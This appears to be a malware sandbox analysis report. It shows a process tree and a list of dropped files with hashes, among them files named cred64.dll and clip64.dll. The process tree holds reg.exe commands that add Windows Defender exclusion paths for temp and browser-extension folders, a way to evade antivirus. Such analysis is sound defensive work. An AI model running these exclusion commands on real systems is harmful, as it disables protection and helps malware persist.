                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:2472
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:4612
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:3932
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:2696
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:444
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:4908
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:2132
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:5036
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:2424
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:4080

                                                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        288KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        d9ec6f3a3b2ac7cd5eef07bd86e3efbc

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        e1908caab6f938404af85a7df0f80f877a4d9ee6

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        35a62eae7497c5445a4e37c60a7789a9

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        70543977466708a64daeb37c3447e2e5f5481780

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        e0366c359fb1868b47e76358d513c5f33c0666f102dc3d3a99830bdc8c84d51c

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        ec8374e14f9f0a2ab3252541d0ecd9b4d74cbaa09ef0a1ddd1d2919b5aa05965c0e96885dad823faad86852dbfdd9552b345f695f096726ea9ed0e616ff3dd27

                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.0MB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        da4a80390ce6fa52c3e50aa7ce8907ed

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        c5eda7ec06cef4ba5e3c4569ece9376638c1e4c2

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        fa867cc0e472d4f446fb3ef1ee55c0e54096299e733f04321d316584eb8a23b3

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        c409fafd518b8df20a380d352252d454bc910a255ded57b0c75a835761ad3db79a911fc0f9bf9c8e1b49416fe66b92b2a65a33b191169cf033692ff2a5aac384

                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\GameSyncLink\installg.bat

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        284B

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        5dee3cbf941c5dbe36b54690b2a3c240

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        62623d22bd9e037191765d5083ce16a3

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        4a07da6872672f715a4780513d95ed8ddeefd259

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        ea96143199ab1ed7ae579ab97f49fb81

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        2478a512206d18140d53adad0729de08eb628a58

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        3191846889894afa6f64b0338c39105b2e64d51efe61b9e2b45eadd26d98c8e7

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        d17082fcc151b65f409a83e63871ec8a0823b889e343d6be8f956d9d91d77d26398bb0539244b455362d514871cf68ffcc5d19cefb3a69a9503514b0af1850e9

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.8MB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        c9723e93969f23222dd7f7efb535d090

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        5477b16d562d678d9228d3840261b3cd6548694b

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        8285e1267c0f625c1261da0f93c5b1364372593b86d167e2895aceccf020d692

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        0be677a0a382de4fcb6c38d32ce06012abc39c78d0fe9f6d1a84826e5b0aae744b52ccb0a47be2ee736ff6c6413293792f9202c40fc5bd39b5e6b4e62c1e18a1

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        ce2807e56f6bc23a90a9eeed4e944ba1

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        a89042da39fc66b177a89da6bc64fa1cdf58f5f4

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        a491b93d4c1c9b28a7e26a55ec9667c43079de24f6c11632421be8ab8a6cac0a

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        7497d0ef8192c60435ccf10749fac5cc30b3a412a8d37968785d4605868d782eb4ac5d38a8ef6ecde19ae380cef26fa1602b3bb76c722ffcdbeab0047b4d5eab

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        321KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        1c7d0f34bb1d85b5d2c01367cc8f62ef

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        33aedadb5361f1646cffd68791d72ba5f1424114

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        304KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        8510bcf5bc264c70180abe78298e4d5b

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        2c3a2a85d129b0d750ed146d1d4e4d6274623e28

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        158KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        586f7fecacd49adab650fae36e2db994

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        35d9fb512a8161ce867812633f0a43b042f9a5e6

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        521KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        c1d583657c7fe7973f820983fd1abb81

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        4cfada887af87f32224fca86ed32edcac00edbec

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        df65905b3f10c47b81ab22ebe370bab5db1a38d511338e6e8cc1ff7294a61744

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        2dc55bbf18ca62a8e5834d7341a646d3ea082eca7e28ad9c75f72e5813ea46cf10ab9fa98d7ab2f2830633f438aa19f2eb4af768dee4b7a130f8eec17936dd88

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        564KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        f15a9cfa3726845017a7f91abe0a14f7

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        5540ae40231fe4bf97e59540033b679dda22f134

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        2dec75328413d4c278c119db42920fb183a88a5398d56ecc80c8cc74fba13071

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        1c2af9608736ad6a02d093f769fe5ec5a06cb395a639e021d4ee3f6c46cebc8c101e7db1064984f801ad3bee65d81b95fe6e2e60c0ec949bb172ba9c455b9869

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.6MB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        740b124a92ec078fe167619d94a74c4a

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        4412bc4dd7af4fca0d40871fb2b3731c98b19431

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        0188a12c5e3bc8bb65e5ecfc78adcb925eb6dda19e946c32e19c92fccec4d9e2

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        434ed35a105fe7be690f937f22effba59ce56248749b602c99c641f63c87f5e8154b2b6f5b5e2441f80bc8edfb58e738826318bce62cd4eca868bdf703b6aedc

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        c29fbb3a01ec30216608b03e1a1dc274

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        3818dae26456dd1e03e7cc6d676e922af30d8ab1

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        3188efd44f56a448c51e60fb43508f1200a6eb02d4e3710ffe583d1671814b93

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        3ebf7e48a19bd4045e508c8c3e594b904b19b1a52a43c5ba25102006b9bf123e60d12d42c4797a5f5ed8b75f9466c29627588ab3ffc0b2c00bef697c9e7562ff

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.5MB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        a61229810448f371ec97d9e191cd993e

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        e91615e808e590335777c5522046b3b8bcf9966c

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        496a01344e8526b0ffc9d0ad8942a109dcbce9bbbb6ce0d733af6ee3fb38cc9b

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        c711c0f3d0425c2498029b601d2a87d9d50cfbe771431dbb543d61c05fc514bcc61f46ded647b226d8a2613b579bd2c348dc62322f3aebb9d4a32b47eefd8389

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        f4361b437f7ecce3203301c2d46e08d6

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        e7af3fe78e83574cb19274b9301050b993dc2a22

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        88340dd258a2464cc528b0ed43fca7de706a2374761e08070991cb7acaab61ac

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        cb9d35fc7a30d213af04196347369f558183bba79e95becd49f9164d12a800a97936bbac09b79540fe2c94ec403208e9edd42254027d3f24f6b93c3b104fb9e7

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        512KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        16da59cd6b2fea896e3b409042d4e97c

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        968c47fa5fa2e7e80bd8945944afd43aebab1785

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        ab506c98856efa6cb59ef3405da7951edcf8eeb496549826fa9035afd854f10c

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        cac45e18efd101d6d98b75cd18a7ffecce56d5fc578dfab15bfd692975908b8741b6b6c6c63d89dbd83eea942caba4b8f26873a42a665322f14c5a90d52e5ccf

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        93c9f8f1a95f851bf440116f751bcce7

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        a213fa145433372facdcf400d2792bef483aba6e

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        57ebc541f2a407f33427df5de743b7a1d543bf635272ef1e9e4ee35c0f2c74a2

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        fc5da77699d8ca584a0fada7216de960a76d55f704dc969ce6c357ad286390b1bf923529db70fa8c619d2cfc211ce8e06a27da41eec40e09f026558bf22a5bd2

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        418KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        0099a99f5ffb3c3ae78af0084136fab3

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        0205a065728a9ec1133e8a372b1e3864df776e8c

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        236KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        0be195eb467b67e6c00bc5e88821d5ac

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        d77634b84160ee79e8838a0c6c32a87fbfdd4b8f

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        603ca6b962a0545bcc4e06308d6e68cd771d535fb34b45960f7242dc855941e6

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        a20b8b8d705d1366431e5386cead3a0ab41b7bb6b506ad745773aa3cd528f54b0cd155502919c82e7d6f972e64c4e7bb1fa04909cf9eb9703949cb75de046c2f

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS841A.tmp\Install.exe

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.5MB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        8abcb16977d520aca91b58717dd61394

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        4583c0aa538f9e02af09cbd97c34a6df3fc40543

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        2321ea3c52fabab2153714eebfc9baad245b135e30aa61171aefd5733a460397

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        48082343223a26a82a88cdea2b629675e87b4f38e183a65645b5c6533a0e85a9197fb1efb0315ecee326e46a40f2d5f9daf96f48ca0411c17cd908d0b9f0bd16

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\TmpA9B8.tmp

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        1420d30f964eac2c85b2ccfe968eebce

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        bdf9a6876578a3e38079c4f8cf5d6c79687ad750

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_45vojr33.5ff.ps1

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        60B

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        109KB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        726cd06231883a159ec1ce28dd538699

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        404897e6a133d255ad5a9c26ac6414d7134285a2

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        12fef2d5995d671ec0e91bdbdc91e2b0d3c90ed3a8b2b13ddaa8ad64727dcd46

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        9ea82e7cb6c6a58446bd5033855947c3e2d475d2910f2b941235e0b96aa08eec822d2dd17cc86b2d3fce930f78b799291992408e309a6c63e3011266810ea83e

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.2MB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        15a42d3e4579da615a384c717ab2109b

                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                        22aeedeb2307b1370cdab70d6a6b6d2c13ad2301

                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                        3c97bb410e49b11af8116feb7240b7101e1967cae7538418c45c3d2e072e8103

                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                        1eb7f126dccc88a2479e3818c36120f5af3caa0d632b9ea803485ee6531d6e2a1fd0805b1c4364983d280df23ea5ca3ad4a5fca558ac436efae36af9b795c444

                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll

                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.2MB

                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                        fc3cbe1b3fd81889d158214e9160ed24

